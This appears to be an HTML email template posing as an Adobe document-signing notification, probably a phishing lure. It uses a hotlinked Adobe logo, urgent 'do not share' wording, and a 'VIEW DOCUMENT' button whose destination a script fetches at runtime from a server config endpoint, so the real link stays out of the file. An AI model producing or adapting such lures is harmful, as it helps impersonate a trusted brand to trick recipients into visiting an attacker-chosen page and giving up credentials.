<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Adobe Notification</title>
  <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
  <style>
    body {
      font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
      background-color: #f4f4f4;
    }
    .container {
      max-width: 600px;
      margin: 20px auto;
      border: 1px solid #ccc;
      background-color: #fff;
    }
    .header {
      background-color: #ff0000;
      color: #fff;
      text-align: center;
      padding: 40px 20px;
    }
    .icon-container {
      position: relative;
      display: inline-block;
      margin-bottom: 20px;
    }
    .icon-container .material-icons.document {
      font-size: 60px;
    }
    .icon-container .material-icons.check {
      font-size: 24px;
      position: absolute;
      bottom: 5px;
      right: 5px;
      background-color: #fff;
      border-radius: 50%;
      color: #ff0000;
    }
    .header p {
      font-size: 18px;
      margin: 0 0 20px 0;
    }
    .button {
      display: inline-block;
      padding: 10px 20px;
      color: #ff0000;
      border: 2px solid #ff0000;
      background-color: #ffffff;
      text-decoration: none;
      font-weight: bold;
      border-radius: 5px;
      box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
    }
    .content {
      padding: 20px;
    }
    .sender {
      font-weight: bold;
      color: #333;
    }
    .timestamp {
      color: #666;
    }
    .footer {
      padding: 20px;
      font-size: 12px;
      color: #666;
    }
    .footer .powered-by {
      margin-bottom: 20px;
      display: flex;
      align-items: center;
      justify-content: center;
    }
    .footer .powered-by img {
      height: 24px;
      margin-left: 5px;
    }
    .footer .disclaimer {
      background-color: #f9f9f9;
      padding: 10px;
      border: 1px solid #ddd;
    }
  </style>
</head>
<body>
  <div class="container">
    <div class="header">
      <div class="icon-container">
        <span class="material-icons document">description</span>
        <span class="material-icons check">check_circle</span>
      </div>
      <p>You have a new document to be signed.</p>
      <a id="viewDocBtn" href="#" class="button">VIEW DOCUMENT</a>
    </div>
    <div class="content">
      
      <p>You have received a new document that requires your signature.</p>
    </div>
    <div class="footer">
      <p class="powered-by">Powered by 
        <img src="https://www.pngall.com/wp-content/uploads/13/Adobe-Logo-PNG-Image-HD.png" alt="Adobe Logo">
      </p>
      <div class="disclaimer">
        <p><strong>DO NOT SHARE THIS EMAIL</strong></p>
        <p>This email contains a secure link to Adobe. Please do not share this email, link, or access code with others.</p>
      </div>
    </div>
  </div>

  <script>
    // Load DOCUMENT_URL from server config
    fetch('/config')
      .then(res => res.json())
      .then(cfg => {
        document.getElementById("viewDocBtn").href = cfg.DOCUMENT_URL;
      })
      .catch(err => console.error("Config load failed", err));
  </script>
</body>
</html>
